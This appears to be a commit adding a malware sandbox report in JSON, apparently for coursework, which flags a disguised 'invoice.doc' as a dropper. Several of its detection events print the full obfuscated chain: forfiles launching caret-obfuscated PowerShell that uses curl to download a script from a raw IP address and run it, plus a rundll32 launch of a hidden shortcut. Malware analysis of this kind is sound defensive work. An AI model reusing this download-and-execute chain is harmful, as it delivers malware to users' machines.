first commit

2026-03-23 19:54:23 +09:00
commit b8b35f9eba
37 changed files with 476 additions and 0 deletions
--- a/Week1/report.json
+++ b/Week1/report.json
@@ -0,0 +1,178 @@
+{
+	"Summary":{
+		"Result":"Malicious",
+		"DetectName":"DOC\/DropFileExec.FW.1010",
+		"EngineName":"profrog",
+		"EngineVersion":"1.5.0.305",
+		"Severity":10,
+		"SampleName":"invoice.doc",
+		"SampleExt":"DOC",
+		"TotalElapsedTime":2.817780,
+		"ReachedFileLoopLimit":false,
+		"ReachedUrlLoopLimit":false
+	},
+	"FileTarget":{
+		"invoice.doc_16880":{
+			"TargetID":"invoice.doc_16880",
+			"ParentID":"",
+			"AbsolutePath":"d:\\Sample\\sample_for_QuadMiners\\invoice.doc",
+			"FileName":"invoice.doc",
+			"FileSize":16880,
+			"FileEXT":"DOC",
+			"MD5":"36B85687634E5B6E4E22CA582D0CC99D",
+			"SHA1":"1B51B1206F2C4B1030A7FCA525454FB4D5BC803E",
+			"SHA256":"invoice",
+			"HAS160":"D80336481A8DD017C0B966BC18E74609243A2F05",
+			"FileHeaderDump":"504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000"
+		},
+		"skeml.lnk_258":{
+			"TargetID":"skeml.lnk_258",
+			"ParentID":"invoice.doc_16880",
+			"AbsolutePath":"D:\/GIT\/tripitaka\/Build\/x64Debug\/tripitaka.exe.sandbox\/C\/Users\/Public\/skeml.lnk",
+			"FileName":"skeml.lnk",
+			"FileSize":258,
+			"FileEXT":"LNK",
+			"MD5":"1205E837D76605911605E2FB589CD98D",
+			"SHA1":"FF41313E2F2A860B0573F5EFA77B9962A88B3D82",
+			"SHA256":"A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D",
+			"HAS160":"086F7D4F4022A035D30A5DAFB1422C0C178C76BE",
+			"FileHeaderDump":"EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A"
+		}
+	},
+	"Detection":{
+		"Event":[
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"FakeEXT-DOCX",
+				"AnalysisCode":"",
+				"Severity":3,
+				"Desc":"DOCX file has faked as `DOC` format.",
+				"DescInternational":{
+					"ko-KR":"DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다."
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"GetObject",
+				"AnalysisCode":"BC",
+				"Severity":1,
+				"Desc":"GetObject(\"NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8\"), RET: WSCRIPT.SHELL",
+				"DescInternational":{
+					"ko-KR":"GetObject(\"NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8\"), RET: WSCRIPT.SHELL"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"CreateShortCut",
+				"AnalysisCode":"BC",
+				"Severity":2,
+				"Desc":"ARF5XJ(WSCRIPT.SHELL).CreateShortCut(\"C:\\Users\\Public\\skeml.lnk\"), RET: SHORTCUT",
+				"DescInternational":{
+					"ko-KR":"ARF5XJ(WSCRIPT.SHELL).CreateShortCut(\"C:\\Users\\Public\\skeml.lnk\"), RET: SHORTCUT"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"Save",
+				"AnalysisCode":"BC",
+				"Severity":1,
+				"Desc":"RECO(SHORTCUT).Save()",
+				"DescInternational":{
+					"ko-KR":"RECO(SHORTCUT).Save()"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"FileCreated",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"New file (C:\\Users\\Public\\skeml.lnk) has been created.\r\n[DEFAULT]\r\nWindowStyle=7\r\nIconLocation=\r\nTargetPath=fOrfiLeS\r\nArguments=\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"\r\nWorkingDirectory=\r\n",
+				"DescInternational":{
+					"ko-KR":"새로운 파일 (C:\\Users\\Public\\skeml.lnk)이 생성되었습니다.\r\n[DEFAULT]\r\nWindowStyle=7\r\nIconLocation=\r\nTargetPath=fOrfiLeS\r\nArguments=\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"\r\nWorkingDirectory=\r\n"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"FileExtracted",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"C:\\Users\\Public\\skeml.lnk",
+				"DescInternational":{
+
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"Exec",
+				"AnalysisCode":"BC",
+				"Severity":3,
+				"Desc":"ARF5XJ(WSCRIPT.SHELL).Exec(\"rundll32 url.dll,OpenURL C:\\Users\\Public\\skeml.lnk\")",
+				"DescInternational":{
+					"ko-KR":"ARF5XJ(WSCRIPT.SHELL).Exec(\"rundll32 url.dll,OpenURL C:\\Users\\Public\\skeml.lnk\")"
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"DropFileExec",
+				"AnalysisCode":"FW",
+				"Severity":10,
+				"Desc":"This is an attack that dropped an hidden file and executes.",
+				"DescInternational":{
+					"ko-KR":"감춰둔 파일을 생성해서 실행하는 공격입니다."
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"invoice.doc_16880",
+				"Name":"RunDll32",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source.",
+				"DescInternational":{
+					"ko-KR":"url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다."
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"skeml.lnk_258",
+				"Name":"ForFiles",
+				"AnalysisCode":"FW",
+				"Severity":3,
+				"Desc":"Attempts to run with forfiles.\r\n\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"",
+				"DescInternational":{
+					"ko-KR":"forfiles로 특정 명령을 실행하려고 합니다.\r\n\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\""
+				}
+			},
+			{
+				"EngineName":"profrog",
+				"EngineVersion":"1.5.0.305",
+				"TargetID":"skeml.lnk_258",
+				"Name":"PowerShell",
+				"AnalysisCode":"FW",
+				"Severity":8,
+				"Desc":"Attempts to perform malicious commands with PowerShell.\r\ncommand:PowerShell.exe \/W 01 curl http: \/\/209.127.20.13\/woke.js -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js",
+				"DescInternational":{
+					"ko-KR":"PowerShell로 악의적인 명령을 수행하려고 합니다.\r\ncommand:PowerShell.exe \/W 01 curl http: \/\/209.127.20.13\/woke.js -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js"
+				}
+			}
+		]
+	}
+}